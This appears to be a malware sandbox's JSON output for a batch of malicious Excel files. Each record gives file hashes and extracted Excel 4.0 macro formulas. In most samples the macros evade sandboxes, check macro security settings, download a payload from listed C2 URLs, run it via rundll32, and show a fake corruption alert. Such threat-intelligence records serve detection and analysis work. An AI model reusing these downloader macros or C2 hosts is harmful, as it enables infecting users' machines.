{"version":"0.2","sample":{"sample":"","kind":"file","target":"000fc53312650d80841e8e250626ef62c68cbcca8fe876e5f0904417697b1cb9"},"analysis":{"reported":"2020-04-09T16:14:36Z","score":10},"files":[{"filename":"000fc53312650d80841e8e250626ef62c68cbcca8fe876e5f0904417697b1cb9","filesize":171008,"md5":"260e028a773e0651f8fdc93cd60f19f3","sha1":"8777aedf5b383cbe7f986f7f95ec44e8baf0d9cf","sha256":"000fc53312650d80841e8e250626ef62c68cbcca8fe876e5f0904417697b1cb9","sha512":"ced164b63563905bada15034e3a33bc9c5816ea726e027877c3fa460def0f0629d670ed22719c40d0826cf71e4d2de29b1e20795da1690958588ec30a8ba4a2b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"000fc53312650d80841e8e250626ef62c68cbcca8fe876e5f0904417697b1cb9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bJA92ixW1P\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"004a9072b2fb33ec418da650b4e114182d8b6ba32de5d7579049751967cf043f"},"analysis":{"reported":"2020-04-09T16:14:36Z","score":10},"files":[{"filename":"004a9072b2fb33ec418da650b4e114182d8b6ba32de5d7579049751967cf043f","filesize":170496,"md5":"2c6ee9bef42e7e5ae489a719c040b783","sha1":"a790927fe096eead27baa3e10f070e35d0167c5d","sha256":"004a9072b2fb33ec418da650b4e114182d8b6ba32de5d7579049751967cf043f","sha512":"0f1a1cfa9814505049d59ccd8b21b4923af5c1b491e0b790403b2234b07c34bc859cc3cb71eae198f01561250196a8ffa8b5ae550073c26050b311503c8b1f24","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"004a9072b2fb33ec418da650b4e114182d8b6ba32de5d7579049751967cf043f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qfxbDKkulf\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"004c1e88ccce207ec2e206124312a58ad9db5e7b11d57cad65c8d639fdd2b4f7"},"analysis":{"reported":"2020-04-09T16:14:36Z","score":10},"files":[{"filename":"004c1e88ccce207ec2e206124312a58ad9db5e7b11d57cad65c8d639fdd2b4f7","filesize":177152,"md5":"433f8ba82b17d7a73d5241ff7f37ef49","sha1":"fe1b193cfb047c11db6eb67dae01bb81eb3b40eb","sha256":"004c1e88ccce207ec2e206124312a58ad9db5e7b11d57cad65c8d639fdd2b4f7","sha512":"a53bf74affeece9ccf68d868dd662196fecaa98d12869e5d546db02011f210e32e461bf4ae22f47addeda959c9f00dd86435ca8b14c7a7d20cb8a6f46e9de880","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"004c1e88ccce207ec2e206124312a58ad9db5e7b11d57cad65c8d639fdd2b4f7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"awBYyzRW4a\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0066bbdf73e28a97dbbb1026712267b56b598eac8a1513da2e8078ce33692e4c"},"analysis":{"reported":"2020-04-09T16:14:36Z","score":10},"files":[{"filename":"0066bbdf73e28a97dbbb1026712267b56b598eac8a1513da2e8078ce33692e4c","filesize":212992,"md5":"feed9fbe50d94d37b86c781da57e2b4a","sha1":"300154ede12b9b683cbfd4b311e7c4c001b976e4","sha256":"0066bbdf73e28a97dbbb1026712267b56b598eac8a1513da2e8078ce33692e4c","sha512":"da68ae820cf913d900cb61a27d30ca15595a2c3cd2a5f3fd0efc8f8caa01a9552ffada222b6bfbcb1c034783521873ce412d260acf4328071fcf4e11285f98df","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0066bbdf73e28a97dbbb1026712267b56b598eac8a1513da2e8078ce33692e4c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GVUHe58Lrb\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0067765141c3b939a69ff10555cdcf870a5969d896e4c03dc6ff9f2151359319"},"analysis":{"reported":"2020-04-09T16:14:36Z","score":10},"files":[{"filename":"0067765141c3b939a69ff10555cdcf870a5969d896e4c03dc6ff9f2151359319","filesize":116224,"md5":"9ea84001aa55be25ef6a9e6274498765","sha1":"1897e7dde2eb8b6b8678e2cbd3e0ff8e3b9e84b8","sha256":"0067765141c3b939a69ff10555cdcf870a5969d896e4c03dc6ff9f2151359319","sha512":"3b8bf64ef1969c4b6169503f071804507133f54d10fc43a1490258b21ce4c5133aa48dc3c333fc0a1a9c1e9e59131c93f5c1a3e3db5366747f04c1434fbc9492","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0067765141c3b939a69ff10555cdcf870a5969d896e4c03dc6ff9f2151359319.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KBozzoNdiP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00858c8c875d57c460974b27e5eaaaab407df01cf3abaf1651463d38a36ab399"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00858c8c875d57c460974b27e5eaaaab407df01cf3abaf1651463d38a36ab399","filesize":219136,"md5":"65bf115ace90908694b8680f25da7422","sha1":"cb7b6a96a15b70e84bd2a662519d4cc64c8c409b","sha256":"00858c8c875d57c460974b27e5eaaaab407df01cf3abaf1651463d38a36ab399","sha512":"47f02c68aa0b84634de5e3b43834a81841a22f02d29da2fc040302e9f90e2fbe9e3cded53c38221fda4722c543e51ffd4420695c614372cdb544495d21ccd642","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00858c8c875d57c460974b27e5eaaaab407df01cf3abaf1651463d38a36ab399.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qu1s87ApuY\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0085c6b1bc9f8ad3598a1cb0301983df6ffe4fa98c10b7893c0eb9c768a9f1cc"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"0085c6b1bc9f8ad3598a1cb0301983df6ffe4fa98c10b7893c0eb9c768a9f1cc","filesize":116224,"md5":"e2c8cbd690153fbedc6429ff1b7b0b85","sha1":"115c15c3ac961a68069b409ed2667d9f2056940e","sha256":"0085c6b1bc9f8ad3598a1cb0301983df6ffe4fa98c10b7893c0eb9c768a9f1cc","sha512":"3034dbdb1cefe2f859d590852c22f2bcaa9acdb7905a9bda6d40be1c0dfd275ea236adcfc17dd49094e4874aa847ec3415884dce3f270893f23ec54f22430fe9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0085c6b1bc9f8ad3598a1cb0301983df6ffe4fa98c10b7893c0eb9c768a9f1cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Jajt2actGn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00963061a97fae17e282f8c116a8e1bed321f1c8c622f27591983fe0caf85e10"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00963061a97fae17e282f8c116a8e1bed321f1c8c622f27591983fe0caf85e10","filesize":112128,"md5":"620958820508183965ed696a1ab3abf5","sha1":"48f87c9c68f4397fca705de5d2bfc538dcf5e3f4","sha256":"00963061a97fae17e282f8c116a8e1bed321f1c8c622f27591983fe0caf85e10","sha512":"39ca101e2eb2ff4ea334e0b819235dd6168223011467c7317b4a0016667b0081a1520afb4737302d159ce386aa54254297d832af04a8f7ae6c3aba0b2d94d691","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00963061a97fae17e282f8c116a8e1bed321f1c8c622f27591983fe0caf85e10.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00a6e2a3723fbcb9b56045582ef43064bc3331d6d70f8bf73ae8cdd31caaa1d4"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00a6e2a3723fbcb9b56045582ef43064bc3331d6d70f8bf73ae8cdd31caaa1d4","filesize":185344,"md5":"f654cded9dd4c155c12660aa14fae7fe","sha1":"c694a7d65fb6868e1ef772f510296b2ce9f06f21","sha256":"00a6e2a3723fbcb9b56045582ef43064bc3331d6d70f8bf73ae8cdd31caaa1d4","sha512":"446ba68bd5d74d1ba037b64d26d2bae1a546851a80ac44f8787d8fb10700cca984cd6bae36f54337cbd39960a686df14d87ae3a9ebef71df9aa56423213fa5ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00a6e2a3723fbcb9b56045582ef43064bc3331d6d70f8bf73ae8cdd31caaa1d4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00aaa4a0510ec5893b4536bc113d1e132b9d9b8b82a5f5ed45d555c08c2b8b5c"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00aaa4a0510ec5893b4536bc113d1e132b9d9b8b82a5f5ed45d555c08c2b8b5c","filesize":185344,"md5":"445aec58836df7d4d31a882d4d09a8b7","sha1":"48bfc20fe83467b0b51e19afba9943fef35bc8c9","sha256":"00aaa4a0510ec5893b4536bc113d1e132b9d9b8b82a5f5ed45d555c08c2b8b5c","sha512":"5217fbfdb85e5e139eaf8fed1f67020e67059c5805e6ef81e6a51cd6eed3053f9b31598c5bacb06e7982774d9d8511227404758372c3c05e72cd1ed2e55be7f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00aaa4a0510ec5893b4536bc113d1e132b9d9b8b82a5f5ed45d555c08c2b8b5c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00ad13fa3fd2b1fe626433aec598726ea494d83f7d185a51a721850cff97781a"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00ad13fa3fd2b1fe626433aec598726ea494d83f7d185a51a721850cff97781a","filesize":212992,"md5":"e1f7b1551c6f7fd72a8450c2a324dc80","sha1":"773caf339c4164799d30756588b9ccd8cec564de","sha256":"00ad13fa3fd2b1fe626433aec598726ea494d83f7d185a51a721850cff97781a","sha512":"1a08abe4979211eca556c20977d6d2cdea16ce57979504c1181819a676b121d4d2a975cf3cb4414727648ceafd47d5bf918f0fc214d5d363984ae4d5a64acb41","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00ad13fa3fd2b1fe626433aec598726ea494d83f7d185a51a721850cff97781a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9Ir6OfjsAA\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00d7e5cc0f107539fe24ab5cbf7b2268cdb4912d20d540a3a29d0ba1b4f51e6b"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00d7e5cc0f107539fe24ab5cbf7b2268cdb4912d20d540a3a29d0ba1b4f51e6b","filesize":167936,"md5":"b3c2d9e3ea685433f64988f07c339290","sha1":"433162cf83d1cf00e7b5f426ed48ff0008971cfb","sha256":"00d7e5cc0f107539fe24ab5cbf7b2268cdb4912d20d540a3a29d0ba1b4f51e6b","sha512":"62e0ebaea5c30f47d21d4822350ad937e5b4c526156bf0fe20c7d777cb6a4a2ee82c72f24e87ff2b86eeb87d42914bb2dcc1e2b194bf3b8dfa3bebc997e8c3d7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00d7e5cc0f107539fe24ab5cbf7b2268cdb4912d20d540a3a29d0ba1b4f51e6b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bnP4f23b6C\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00da95a1665dbec24aec0f9fe91f6c4ea3d88c823880d6ef17a1be69be943f85"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00da95a1665dbec24aec0f9fe91f6c4ea3d88c823880d6ef17a1be69be943f85","filesize":177152,"md5":"10f43da6960c43ee1986390a0b85113c","sha1":"596e8985b1301ab02e3dcf45332a48967b472812","sha256":"00da95a1665dbec24aec0f9fe91f6c4ea3d88c823880d6ef17a1be69be943f85","sha512":"1ec3d2647fecc62fcce396616c1cab6dd4efe60c965c4c442a46c6cc634159779448e3021bf3a5cdbc2833c2f713ea2696f14da5343636fdc860b62086478a38","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00da95a1665dbec24aec0f9fe91f6c4ea3d88c823880d6ef17a1be69be943f85.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pXGHh1U428\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00e0e2bb068864ecc2d55ab07fed08ad1b23c60caae8c0a47d550d9ba9b579e5"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00e0e2bb068864ecc2d55ab07fed08ad1b23c60caae8c0a47d550d9ba9b579e5","filesize":160768,"md5":"c4dd8e7592c820dc2aa3c02568083f10","sha1":"b573c1fda9c019c254927904699370d38e24ead0","sha256":"00e0e2bb068864ecc2d55ab07fed08ad1b23c60caae8c0a47d550d9ba9b579e5","sha512":"26d8038adc97c7179a122914a5bcb852b3785e1213d6734fb45fe3c64f20b0f0fcbf88ec9b700d05de2a3fbeac1a6320f23c02ec026defd8bd4d906e528c8a16","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00e0e2bb068864ecc2d55ab07fed08ad1b23c60caae8c0a47d550d9ba9b579e5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BsPMkugzLn\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"00f296ddd88dab344435a38a0718bc874001f8138e674ad3483523f8bb31319e"},"analysis":{"reported":"2020-04-09T16:14:37Z","score":10},"files":[{"filename":"00f296ddd88dab344435a38a0718bc874001f8138e674ad3483523f8bb31319e","filesize":185344,"md5":"b4e589a4542774ed9f0b732566651319","sha1":"a67bf26513898cf58e896cddb7c410a311999090","sha256":"00f296ddd88dab344435a38a0718bc874001f8138e674ad3483523f8bb31319e","sha512":"3fd3065431044927e8caf7c92c3d8d637a8d056deea15a68965cac4be19bf9427bcb59db550a37b040808c2cda2319c37416cea8adcc78aaceb9d046bb2810f5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"00f296ddd88dab344435a38a0718bc874001f8138e674ad3483523f8bb31319e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
